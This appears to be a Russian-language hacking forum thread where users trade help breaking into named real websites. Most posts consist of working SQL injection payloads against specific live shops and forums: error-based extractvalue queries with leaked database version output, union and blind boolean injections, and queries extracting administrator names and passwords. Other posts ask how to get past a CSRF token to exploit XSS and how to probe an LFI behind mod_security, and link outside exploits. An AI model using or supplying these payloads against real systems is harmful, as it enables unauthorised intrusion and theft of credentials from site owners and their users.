Куда ему деваться , сам виноват, если надо могу кинуть сайт где в основном sql , туда парни постят и надо раскручивать их .
Парни, вы уж извините вот еще такой вариант http://www.gameliner.nl/index.php?categoryid=1 с кавычками есть ошибка пытался с комментированием и без комментирования , но вывод так и не нашел, мб просто нет ничего? или криворукость и отсутствие опыта..дает о себе знать?
Code: ~$ curl -s -k 'http://www.gameliner.nl/review/1615&&(1)=(1)and(extractvalue(0x0a,concat(0x0a,(select(version())))))/mafia-iii' Mysql failure:<br> -----------------------------<br> <i>Query: SELECT r.id as id, r.score as score, bericht, u.titel as uitgever_titel, k.medewerker AS auteur, g.id as game_id, p.titel as titel, pl.id as platform_id, pl.titel as platform, p.ean AS ean, keywords FROM reviews AS r LEFT OUTER JOIN klanten AS k ON k.id = r.auteur_id LEFT OUTER JOIN games AS g ON r.game_id = g.id LEFT OUTER JOIN platformen AS pl ON g.platform_id = pl.id LEFT OUTER JOIN producten AS p ON p.game_id = g.id LEFT OUTER JOIN uitgevers AS u ON u.id = g.uitgever_id WHERE r.id = 1615&&(1)=(1)and(extractvalue(0x0a,concat(0x0a,(select(version())))))<br>Error: XPATH syntax error: ' 5.1.73' 5.1.73
Помогите раскрутить/ обойти фильтр Code: https://visionusasupplies.com/-pr_id-47' or 0--+ - так изначальный товар https://visionusasupplies.com/-pr_id-47' or 1--+ - совсем другой https://visionusasupplies.com/-pr_id-47' or 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54--+ 54 поля, но ничего не выводит Спасибо BabaDook и qqq1457
крути как слепую https://visionusasupplies.com/-pr_id-47'+and+substring(version(),1,1)=5+--+ https://visionusasupplies.com/-pr_i...((select+id+from+users+limit+1,1),1,1))>1+--+ https://visionusasupplies.com/-pr_i...select+name+from+users+limit+1,1),1,1))>1+--+ пример тут http://www.truehackers.ru/articles/vulnerabilities/4102-sql-injection-vzlom-v-slepuju
народ, подскажите как такое крутить? http://www.gamepowerbazaar.com/stor...=Silkroad Online&dbId=183&goldId=80&epinId=80 уязвимость http://www.gamepowerbazaar.com/store/comersus_listGames.asp?gameName=Silkroad Online&dbId=183 вот тут, а дальше пытаюсь через юнион не особо получается.
никогда не останавливайся на скули которая не выводится,если есть рядом другая более удобная http://www.gamepowerbazaar.com//store/sssDetay.asp?sssId=0+UNION+SELECT+1,2,3 вывод увидишь пример: http://www.gamepowerbazaar.com//sto...1,2,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES фильтруются скобки походу () p.s. Spoiler: или так p.s. можно havi' ем ,то есть подставляешь все данные как на рисунке: http://i67.tinypic.com/23wk64l.jpg то есть получаем вывод через error base sql injection затем уже ручками выводим логины+ пассы http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+0,1 1й админ http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+1,1 2й админ админку не искал ,да и странные пароли админов а вообще это "commersus shop" .они уязвимы вот почитай как пароли расшифровать http://downloads.securityfocus.com/vulnerabilities/exploits/backoffice_mult_exp.pl вот.
Есть форма с ХSS в поле регистрации , но также есть токен , который не позволяет скопировать форму и юзать ее с хостинга . В таком случае никак не получится воспользоватся уязвимостю ? Или можно post переделать в get как то ?
найдена дырка в http://www.gamers-forum.com/misc.php тип инъекции (post) воот с такими параметрами, vsa_send=Submit&amount=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&chooser=5&securitytoken=guest пробовал через мап и хавидж, на большее пока меня не хватило, подскажите есликто знает, как с этим дальше бороться?
Из-за Mod_Security не могу достоверно проверить, есть ли LFI тут _ttp://kor.dk/musik/vespa/getid3/getid3.php Exploit: _ttps://www.exploit-db.com/exploits/36664/